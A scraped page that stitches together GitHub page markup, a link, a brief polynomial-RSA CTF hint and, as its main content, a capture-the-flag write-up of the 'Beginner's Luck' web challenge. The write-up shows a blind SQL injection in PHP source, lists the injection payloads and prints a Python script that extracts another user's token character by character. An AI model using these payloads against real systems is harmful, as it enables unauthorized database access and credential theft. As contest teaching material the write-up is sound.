<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Beginner's Luck
Web, 989 points.
## Description
*Can you help me to win the flag ? I bet you can't ..*
We were given a website along with its sourcecode (PHP).
## Solution
The site greets us with a page in which we can click on a "Generate" button. Everytime we click on it, a random token is generated, and thesite says "Better luck next time!". We are given 10 attempts ; after those, the site says "Max Attempts Reached" and our session is reset.
Taking a look at the source, here is what we can read.
```HTML<form id="form" method="POST" action="" > <input name="val" type="hidden" id="val">
</form><script type="text/javascript">
function generate_random_string(string_length){ let random_string = ''; let random_ascii; for(let i = 0; i < string_length; i++) { random_ascii = Math.floor((Math.random() * 25) + 97); random_string += String.fromCharCode(random_ascii) } return random_string}
function generate(){ const input=document.getElementById("val"); input.value=generate_random_string(100); document.getElementById("form").submit();}</script><div class="buttonHolder"><input type="button" name="b1" value="Generate" onclick="generate()"></div>```
Every time we click on the button, our client generates the random 100-character token, and then sends it via POST. Our goal is to find the correct token.
Let's take a look at the source files we are given : [index.php](index.php), [play.php](play.php) and [reset.php](reset.php).
When we first connect to [index.php](index.php), our session is initialized and a random 100-character token is created for our session. We are not given the details of the generator function, though, but since they make our client generate random tokens on lowercase letters, we can infer the session token is the same. Right?
```phpif (!isset($_SESSION['count'])){ $_SESSION['count'] = 0; $pass = generateRandomToken(100); $ip = $_SERVER['REMOTE_ADDR']; $sql = "INSERT INTO users (ip, token) VALUES (?,?)"; $stmt = $pdo->prepare($sql); $stmt->execute([$ip, $pass]);}```
A table `users` stores (ip, token) couples. Then in [play.php](play.php), when we send a token via POST :
```PHPif (isset($_POST["val"])) { if ($_SESSION['count'] >= $max_count) { header("Location:reset.php"); die(); }
$_SESSION['count']++; try { $sql = "SELECT * FROM users WHERE ip='" . $_SERVER['REMOTE_ADDR'] . "' AND token='" . $_POST['val'] . "'"; $result = $conn->query($sql); if ($result) { $row = $result->fetch_assoc(); } else { $row = false; } }
catch(PDOException $e) {
// echo $e;
}
if ($row) { echo "<h1>True</h1>"; echo "<div><h4>Click here and use the token to get your flag</h4></div>"; } else { echo "<h4>Better luck next time !</h4>"; }
$currentValue = $_POST['val']; }```
An SQL query checks if there exists an entry for our (ip, token). If there is, we are invited to input our token in a page called flag.php (which is not present in the sources), so that we can claim our flag.
The following line is prone to a very obvious SQL injection.
```PHP$sql = "SELECT * FROM users WHERE ip='" . $_SERVER['REMOTE_ADDR'] . "' AND token='" . $_POST['val'] . "'";```
We don't know the exact output of the SQL request, so we cannot run a "UNION" type of SQL injection, but we do know whether it returns something or not.Indeed, when there exists such a couple (ip, token), the database returns at least a row and the site displays "True", "Click here and use the token to get your flag".Otherwise, it displays "Better luck next time". We can use this information to run a blind SQL injection.
Let's check by sending a pretty basic injection first in `$_POST['val']` :
```' OR '1'='1```
The site returns "True". It worked! Let's try to run another injection :
```' OR (ip='our ip' AND length(token)=100) AND '1'='1```
It works too: the token is 100 characters long. Good. Now we're able to write a small script that will brute-force each character individually thanks to the SUBSTRING function of MySQL.
There's an issue, though. Our session is reset and destroyed after 10 requests. We can't find a 100-character token with only 10 binary requests...
Our solution was to use two different IPs with a teammate. One person would be running the injection, but looking for the token associated to the other person's IP. Making sure that other person kept their session alive, they could then submit the token without increasing the number of attempts at all.
Our payload looks like this :
```' OR (ip='teammate IP' AND substring(token,[i],1)='[c]') AND '1'='1```
Where i is between 1 and 100, and c in the lowercase letters charset. Except it was not the case. We ran the injection once and found many characters in the token that were actually not letters.We then ran the injection again with lowercase letters + digits, and it worked. Those bastards had fooled us with that javascript generator! :D
Here is the exploit in Python.
```pythonimport requests
url = "https://web4.ctfsecurinets.com/play.php"
injection = "' OR (ip='teammate IP' AND substring(token,%s,1)='%s') AND '1'='1"token = ''
for i in range(1, 101): for b in 'abcdefghijklmnopqrstuvwxyz0123456789': # Resetting the session and requesting a new one, just in case. # The exploit would have been faster by removing this. requests.get(url.replace('play', 'reset')) s = requests.session() s.get(url.replace('play', 'index')) c = s.post(url, data={'val': injection % (i, b)}).content if b'>True<' in c: token += b print(i, token) break```
And we get our friend's token, for instance, `qx9tiuvxniog4qfkulftatkvysgiosw4qwppqcevks1f98hujnejxp6w8dvnvsjdfytw0xicha9h9g1it7simo4lrryea99gys2q`.
Input it in flag.php and get the flag. Enjoy!
Note: the exploit could have been much faster if we tested bits in the token instead of looping through a charset. Since there are 36 characters, which is approximately 5 bits, we could have been able to retrieve a character using only 6 requests instead of 36 worst case scenario. The payload would have been more complicated though, running some conversions and stuff.
|
> [https://github.com/mohamedaymenkarmous/CTF/tree/master/CTFSecurinetsQuals2019?fbclid=IwAR3Fm9aM4L7ASX-BtroMuJdKau6fHCdV6HDW_fbl_jcAdTlcJx-7YjklTdY#custom-location](https://github.com/mohamedaymenkarmous/CTF/tree/master/CTFSecurinetsQuals2019?fbclid=IwAR3Fm9aM4L7ASX-BtroMuJdKau6fHCdV6HDW_fbl_jcAdTlcJx-7YjklTdY#custom-location) |
tl;dr1. Factor polynomial `n` into polynomials `p` and `q`2. Calculate `s = (2^p_deg - 1)*(2^q_deg - 1)`3. Calculate `d = modinv(e,s)`4. Solve `pt = pow(ct, d, n)`
https://github.com/p4-team/ctf/tree/master/2019-03-23-0ctf-quals/crypto_babyrsa |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTF/0ctf_2019/baby_aegis at master · agadient/CTF · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="EB6F:1F9B:4EDF870:5107D45:64122514" data-pjax-transient="true"/><meta name="html-safe-nonce" content="b9f83334e5ac96029613f8c6e0f975eec78658f2851f1b958aa9e426d96fb7cb" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFQjZGOjFGOUI6NEVERjg3MDo1MTA3RDQ1OjY0MTIyNTE0IiwidmlzaXRvcl9pZCI6IjIzMjg4ODY3Nzc0NTA5OTcwMTIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="3367cb59f6d5d3078090ce039b2a910a0d8271f13bacfc591e80613af7e4d989" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:167091212" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/a1bd14b8e2be9f0e450aa4e6857c3a7262faae5984cfb879fe83c6786145659e/agadient/CTF" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF/0ctf_2019/baby_aegis at master · agadient/CTF" /><meta name="twitter:description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/a1bd14b8e2be9f0e450aa4e6857c3a7262faae5984cfb879fe83c6786145659e/agadient/CTF" /><meta property="og:image:alt" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF/0ctf_2019/baby_aegis at master · agadient/CTF" /><meta property="og:url" content="https://github.com/agadient/CTF" /><meta property="og:description" content="CTF writeups. Contribute to agadient/CTF development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/agadient/CTF git https://github.com/agadient/CTF.git">
<meta name="octolytics-dimension-user_id" content="27151461" /><meta name="octolytics-dimension-user_login" content="agadient" /><meta name="octolytics-dimension-repository_id" content="167091212" /><meta name="octolytics-dimension-repository_nwo" content="agadient/CTF" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="167091212" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agadient/CTF" />
<link rel="canonical" href="https://github.com/agadient/CTF/tree/master/0ctf_2019/baby_aegis" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
